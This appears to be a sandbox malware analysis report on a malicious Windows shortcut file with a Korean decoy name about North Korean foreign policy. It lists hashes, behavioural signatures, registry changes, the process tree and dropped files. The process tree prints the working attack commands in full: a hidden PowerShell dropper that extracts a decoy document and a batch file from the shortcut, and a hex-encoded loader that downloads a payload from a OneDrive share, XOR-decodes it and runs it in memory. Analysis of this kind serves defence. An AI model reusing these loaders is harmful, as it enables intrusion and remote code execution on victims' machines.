6234ef67435dfcb65bd661b5f3bb0b77b82fe6cdd2109b6dfb9dea1b65a17d5d

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
04-04-2023 07:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

북한외교정책결정과정.lnk
Size

29.7MB
MD5

be32725e676d49eaa11ff51c61f18907
SHA1

37ee57a1097bbacbece974653c0ec435ee19b4f3
SHA256

479894be4c5dec0992ad3c5b21fb1423643996d80d59dcca76386bb325dc811e
SHA512

f65a64a2934659cf7c5b58b37708011f8cfed60c5fdcb226159d3b9bcba8d551149a1769ae10486c4f33452e87261e884830be22474d10ffe8da1362b9ffeddf
SSDEEP

1536:fAJ+YScrgY3VAmoxV9RUDCcilpZLm+YScbgY3VAmoxV9RUDCcilpZL9yJ9P:fAPFVCDRgziNmFVCDRgziN9k9P

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

Processes:

powershell.exe

flow	pid	process
4	1928	powershell.exe
6	1928	powershell.exe
8	1928	powershell.exe
9	1928	powershell.exe
10	1928	powershell.exe
11	1928	powershell.exe
12	1928	powershell.exe
13	1928	powershell.exe
14	1928	powershell.exe
15	1928	powershell.exe
16	1928	powershell.exe
18	1928	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 10 IoCs

Processes:

rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\hwp_auto_file\	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\hwp_auto_file\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\hwp_auto_file\shell\Read\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\hwp_auto_file	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\.hwp	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\.hwp\ = "hwp_auto_file"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\hwp_auto_file\shell\Read	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000_CLASSES\hwp_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\""	rundll32.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

cmd.exe

pid process

1424 cmd.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1768 powershell.exe
1928 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1768 powershell.exe
Token: SeDebugPrivilege 1928 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

AcroRd32.exe

pid process

840 AcroRd32.exe
840 AcroRd32.exe

pid	process
1424	cmd.exe

pid	process
1768	powershell.exe
1928	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	1928	powershell.exe

pid	process
840	AcroRd32.exe
840	AcroRd32.exe

Suspicious use of WriteProcessMemory 63 IoCs

Processes:

cmd.execmd.exepowershell.execmd.execmd.exerundll32.exepowershell.execsc.execsc.execsc.execsc.exe

description	pid	process	target process
PID 1512 wrote to memory of 1424	1512	cmd.exe	cmd.exe
PID 1512 wrote to memory of 1424	1512	cmd.exe	cmd.exe
PID 1512 wrote to memory of 1424	1512	cmd.exe	cmd.exe
PID 1512 wrote to memory of 1424	1512	cmd.exe	cmd.exe
PID 1424 wrote to memory of 1768	1424	cmd.exe	powershell.exe
PID 1424 wrote to memory of 1768	1424	cmd.exe	powershell.exe
PID 1424 wrote to memory of 1768	1424	cmd.exe	powershell.exe
PID 1424 wrote to memory of 1768	1424	cmd.exe	powershell.exe
PID 1768 wrote to memory of 1568	1768	powershell.exe	rundll32.exe
PID 1768 wrote to memory of 1568	1768	powershell.exe	rundll32.exe
PID 1768 wrote to memory of 1568	1768	powershell.exe	rundll32.exe
PID 1768 wrote to memory of 1568	1768	powershell.exe	rundll32.exe
PID 1768 wrote to memory of 1568	1768	powershell.exe	rundll32.exe
PID 1768 wrote to memory of 1568	1768	powershell.exe	rundll32.exe
PID 1768 wrote to memory of 1568	1768	powershell.exe	rundll32.exe
PID 1768 wrote to memory of 1832	1768	powershell.exe	cmd.exe
PID 1768 wrote to memory of 1832	1768	powershell.exe	cmd.exe
PID 1768 wrote to memory of 1832	1768	powershell.exe	cmd.exe
PID 1768 wrote to memory of 1832	1768	powershell.exe	cmd.exe
PID 1832 wrote to memory of 776	1832	cmd.exe	cmd.exe
PID 1832 wrote to memory of 776	1832	cmd.exe	cmd.exe
PID 1832 wrote to memory of 776	1832	cmd.exe	cmd.exe
PID 1832 wrote to memory of 776	1832	cmd.exe	cmd.exe
PID 776 wrote to memory of 1928	776	cmd.exe	powershell.exe
PID 776 wrote to memory of 1928	776	cmd.exe	powershell.exe
PID 776 wrote to memory of 1928	776	cmd.exe	powershell.exe
PID 776 wrote to memory of 1928	776	cmd.exe	powershell.exe
PID 1568 wrote to memory of 840	1568	rundll32.exe	AcroRd32.exe
PID 1568 wrote to memory of 840	1568	rundll32.exe	AcroRd32.exe
PID 1568 wrote to memory of 840	1568	rundll32.exe	AcroRd32.exe
PID 1568 wrote to memory of 840	1568	rundll32.exe	AcroRd32.exe
PID 1928 wrote to memory of 1560	1928	powershell.exe	csc.exe
PID 1928 wrote to memory of 1560	1928	powershell.exe	csc.exe
PID 1928 wrote to memory of 1560	1928	powershell.exe	csc.exe
PID 1928 wrote to memory of 1560	1928	powershell.exe	csc.exe
PID 1560 wrote to memory of 384	1560	csc.exe	cvtres.exe
PID 1560 wrote to memory of 384	1560	csc.exe	cvtres.exe
PID 1560 wrote to memory of 384	1560	csc.exe	cvtres.exe
PID 1560 wrote to memory of 384	1560	csc.exe	cvtres.exe
PID 1928 wrote to memory of 580	1928	powershell.exe	csc.exe
PID 1928 wrote to memory of 580	1928	powershell.exe	csc.exe
PID 1928 wrote to memory of 580	1928	powershell.exe	csc.exe
PID 1928 wrote to memory of 580	1928	powershell.exe	csc.exe
PID 580 wrote to memory of 1704	580	csc.exe	cvtres.exe
PID 580 wrote to memory of 1704	580	csc.exe	cvtres.exe
PID 580 wrote to memory of 1704	580	csc.exe	cvtres.exe
PID 580 wrote to memory of 1704	580	csc.exe	cvtres.exe
PID 1928 wrote to memory of 1056	1928	powershell.exe	csc.exe
PID 1928 wrote to memory of 1056	1928	powershell.exe	csc.exe
PID 1928 wrote to memory of 1056	1928	powershell.exe	csc.exe
PID 1928 wrote to memory of 1056	1928	powershell.exe	csc.exe
PID 1056 wrote to memory of 896	1056	csc.exe	cvtres.exe
PID 1056 wrote to memory of 896	1056	csc.exe	cvtres.exe
PID 1056 wrote to memory of 896	1056	csc.exe	cvtres.exe
PID 1056 wrote to memory of 896	1056	csc.exe	cvtres.exe
PID 1928 wrote to memory of 608	1928	powershell.exe	csc.exe
PID 1928 wrote to memory of 608	1928	powershell.exe	csc.exe
PID 1928 wrote to memory of 608	1928	powershell.exe	csc.exe
PID 1928 wrote to memory of 608	1928	powershell.exe	csc.exe
PID 608 wrote to memory of 1324	608	csc.exe	cvtres.exe
PID 608 wrote to memory of 1324	608	csc.exe	cvtres.exe
PID 608 wrote to memory of 1324	608	csc.exe	cvtres.exe
PID 608 wrote to memory of 1324	608	csc.exe	cvtres.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\북한외교정책결정과정.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0001DB1D86} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00091558 -ReadCount 00091558; $pdfPath = 'C:\Users\Admin\AppData\Local\Temp\230402.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002470)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00094808 -ReadCount 00094808; $exePath = 'C:\Users\Admin\AppData\Local\Temp\230402.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00091558)) -Encoding Byte; ^& $exePath;
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0001DB1D86} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00091558 -ReadCount 00091558; $pdfPath = 'C:\Users\Admin\AppData\Local\Temp\230402.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 002470)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00094808 -ReadCount 00094808; $exePath = 'C:\Users\Admin\AppData\Local\Temp\230402.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00091558)) -Encoding Byte; & $exePath;
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\230402.hwp
4⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1568

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\230402.hwp"
5⤵
- Suspicious use of SetWindowsHookEx
PID:840

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\230402.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:1832

\??\c:\Windows\SysWOW64\cmd.exe
c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$ppams ="$eric5="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C3355766379464264544A746554463461445A304F46686E556A4A4E656D317A4F47356F556E64764C545A4350325539616B6849517A5A352F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$bulst="""""";for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
5⤵
- Suspicious use of WriteProcessMemory
PID:776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "$ppams ="$eric5="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C3355766379464264544A746554463461445A304F46686E556A4A4E656D317A4F47356F556E64764C545A4350325539616B6849517A5A352F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$bulst="""""";for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1928

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gikuo2xu.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES35D2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC35D1.tmp"
8⤵
PID:384

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mxioclke.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:580

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3803.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC37F3.tmp"
8⤵
PID:1704

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o4ho4ury.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A44.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3A43.tmp"
8⤵
PID:896

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rfugacsr.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:608

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D02.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3D01.tmp"
8⤵
PID:1324

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
61KB

MD5
e71c8443ae0bc2e282c73faead0a6dd3

SHA1
0c110c1b01e68edfacaeae64781a37b1995fa94b

SHA256
95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

SHA512
b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\230402.bat
Filesize
3KB

MD5
461ce7d6c6062d1ae33895d1f44d98fb

SHA1
76e9c63f48121faf26bc1046eac27ec6967e64d4

SHA256
70f9216f0c5badb24120f74270dbbc5100b07c4fc6eb45f6652b00882290a73c

SHA512
680e1503a4ce7fe49ebe559531102710a2b50e59ee65d6aa20a0af1d8a58a4986f198c8f03a58bdb13fcc76cedc9724812e8948a42b45c8a6066bb250554f03b

Download Submit
C:\Users\Admin\AppData\Local\Temp\230402.bat
Filesize
3KB

MD5
461ce7d6c6062d1ae33895d1f44d98fb

SHA1
76e9c63f48121faf26bc1046eac27ec6967e64d4

SHA256
70f9216f0c5badb24120f74270dbbc5100b07c4fc6eb45f6652b00882290a73c

SHA512
680e1503a4ce7fe49ebe559531102710a2b50e59ee65d6aa20a0af1d8a58a4986f198c8f03a58bdb13fcc76cedc9724812e8948a42b45c8a6066bb250554f03b

Download Submit
C:\Users\Admin\AppData\Local\Temp\230402.hwp
Filesize
87KB

MD5
9c4331ba00ef420ea08b65f5a8f61b56

SHA1
3c9dc80f3deaa7705c1fc81cd373bd4dbd3e794f

SHA256
dc643e8e5a7646c14fd63e1f86ecdf3cd623f48c61e0c1fb95161779309f921f

SHA512
a3ffcc4225f01cf2f2e4ca73df28d68c72ac16cc27777b10d06d5dc047e3a815b4454da53b517df63d54b2f65180a4b52c3ce030cd294e2f8d40fd18163f46cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES35D2.tmp
Filesize
1KB

MD5
4e1c4aa6288fe3c003efbba5d7c026a5

SHA1
2ef88e9f28de83ddb7ffbb2114a343980d7a401c

SHA256
8d5ce38aee73bf63e9e7d89b6abb1a190c4e4bb8b1d6e959973ef2137fbc2c25

SHA512
eba342f194264486e185a4a4a6e8c7b94934791dbfda9ae8439b24abd19f9279802bc5d4655846cd989fe14ccb52ec868f385a0a32448c4bde4c0780996f8672

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3803.tmp
Filesize
1KB

MD5
100a2dfee260e31d3dc6b05784c07417

SHA1
8073e5775f404f082fc91fe1befe2ba6c0305f0d

SHA256
a823defd21b6d50de3a6a47772cd4275d2c2188c5ed971503142f08c6201cfd7

SHA512
1bdb5772ad1b53d750da3847668ecb498f6fb6f7142778c58df42883aab6e0b451a52ccf402244292f8c5577fff235b3b7a5cdf456adc7f92ebfb549750616be

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3A44.tmp
Filesize
1KB

MD5
b52510cbd2970cfee0b54596ac9f0c33

SHA1
d086925a8b141dda1b4bc1f9ccf2e8af8680258c

SHA256
6afc3e36670c9aae857abf7106b9712a53f30f8850ffe5a3436d934421ff76e0

SHA512
1c4901fe434152240f470805fa7eb02ebb904d3238d07577dcf3b19b4d4f263a6e1a216dcc60de0a72e5842be181c50349ed3289d8bf0fe68280cd314c83aa30

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3D02.tmp
Filesize
1KB

MD5
0741a75ea47a28669d0d8b65227b25d7

SHA1
91f0a9d1e924e0a20872dd0284c617698c9343c2

SHA256
a52a9f1d8b4667a43bf0a590a946c65ada7e0b8a7ac1a3b90036c63fda246a75

SHA512
9e5fac39c0152c0877ada387439bd31191f595c08f8b3ce1d16663d93e7edb49e03c7de43e6f73ca0256c8331723df1186003479ad9b670ee72cb6bdf999ec1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar60CE.tmp
Filesize
161KB

MD5
be2bec6e8c5653136d3e72fe53c98aa3

SHA1
a8182d6db17c14671c3d5766c72e58d87c0810de

SHA256
1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd

SHA512
0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\gikuo2xu.dll
Filesize
3KB

MD5
d0ac2fdd48f27f0df48ecb75d271e13d

SHA1
0d5df2df5e5de5e2e02442e3ba1b6035d5e8612b

SHA256
1e3ace9402d0ad518ebfb39425a2a67c234b68d44cbfcb0337279ff9b7fcff06

SHA512
51725695318fff8f326e82a799da0f10a4a29c8ce594aca161a9a2fda77cb8ce5a5a8ed97ce8bac33299c72e07be3a75fa4c297e5320390c4e42e4a62a9250cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\gikuo2xu.pdb
Filesize
7KB

MD5
0475d26c40695ebf2a720a8355ef4502

SHA1
ecc788e185ce8df8dc86ba9355188e30db1b31a1

SHA256
47978f02ebe53f9fec678080887e0cb049f654fdc6099c90fcd32811d543be90

SHA512
5d1b192052ba74171cbf6b7779986730cf9e0a44d45905e4fc6f32b1eb551d40279fcdeea7977c598c9eed061bf45cb8adfc0e16404f0e5b568afd2cb6f2e242

Download Submit
C:\Users\Admin\AppData\Local\Temp\mxioclke.dll
Filesize
3KB

MD5
a4cef9954d42fd3df8a27c647104cee6

SHA1
251764685cbd6d80c68c6d68bcac58eff7f982da

SHA256
bea99be31176f1cd8aa2cca0d08565bd61dca7b94b62a2742271e68af326d16a

SHA512
ea6b5209bef056eef72cb08dbfb71b9e04dcded6018f0639482557c13901d078cb087f2df704c59645f823b7341c5e3b57160e6364a2bc9f512279a627d4d7ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\mxioclke.pdb
Filesize
7KB

MD5
1b0e46cb7665e3921bce15f7c41a3974

SHA1
b952fbe8c99b401c88aa2c9e54e637bd1e5fd2fd

SHA256
3239056837eef3e71a6415167dc84ebc0c7555a491b1e7eda21cb2b8d739a87b

SHA512
504e3482a60169db9ecdf2f8876c996ef06d1fca78c49bae775e9ce30fd4b943ad30d6ce2f09852d2397bcb027e8391e450d71ecf1925977324f3a08a304c169

Download Submit
C:\Users\Admin\AppData\Local\Temp\o4ho4ury.dll
Filesize
3KB

MD5
1a0f99a93ed58657c4f15c764b4bfbea

SHA1
59fdaa3e136b3cfb5dd9f182e259ea13d6c1c2ea

SHA256
e690a42fc90f0cd33720cd5444ce7a56ace33c42e559a7bec039d241c1471716

SHA512
79b47bf30e1ccecf0fce2e06190c91ee216c8f99527da96c9330b295d6f6141617b0160dc63e21a340a7a474a4ffa4947d17916060ecd293499a179c3e94b286

Download Submit
C:\Users\Admin\AppData\Local\Temp\o4ho4ury.pdb
Filesize
7KB

MD5
1d360fb2de8b6ae07b06311e12f39a3d

SHA1
f65628348c7b73a3d5b963f5f2fa1e3f7f9f3576

SHA256
a1712b9c0f3ddc055b5ea48bae1951896b388ffeeafd2872565dc0ea2c85c3af

SHA512
5772325689140eb12696125d9cb815731a5466c9b94149b039ecc5c5b987cfb6aa791d2cd6768599842c2fecd49124be677d3366e579f4f827b9fc8c9db1b52d

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfugacsr.dll
Filesize
3KB

MD5
fdfe144a9a19f0f8e4c7596cc11f941d

SHA1
1f47aba01137f324e6ef36281cdede6f434342c4

SHA256
29741e4fd36d02015a730f4777c1a62237c16ce1bdeb0e122b07d59937c63356

SHA512
9d7d4c090129543dd289890e77ca931058112996c99fc090adece91ea1ee64101cdac723ecb8e9eacee6cf5548a050cb1c3f50b8dc601e6917b807a24aa308b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfugacsr.pdb
Filesize
7KB

MD5
768dcbbcc2eb3a130beb5b3560788890

SHA1
46d8b28fed0b8101c8dff0410d349645393eec73

SHA256
0e15bb78fbb8402c651c4c8e8bc4c5dca5b20f937fd2055573bd88190f93a91b

SHA512
7be07e5d91f439fc543e72190a177fd50b995bd7198e0735eb3f8dd9fe959c99e3219c716f9417e18f4bb59cd93f928aab683ade616835eb002c04324cb1381a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IVW3MRMOXT5187A7WGLN.temp
Filesize
7KB

MD5
4b8131009b3c3c24a0d4edae33c58860

SHA1
d6e3835ff003ef5d1199c8529fe9e976f37c540f

SHA256
74430789309e324ba0af6585014b95730bb19df7dd4655aa843b517575d6aabc

SHA512
cc7fbc8d28d3e7dc8c3512aa29dd240752617afb64f15d6859a0cf62c177ccb072d773528ee09869e862f2a620adfcaf4be040f90053e366b87ee8722abb063c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
4b8131009b3c3c24a0d4edae33c58860

SHA1
d6e3835ff003ef5d1199c8529fe9e976f37c540f

SHA256
74430789309e324ba0af6585014b95730bb19df7dd4655aa843b517575d6aabc

SHA512
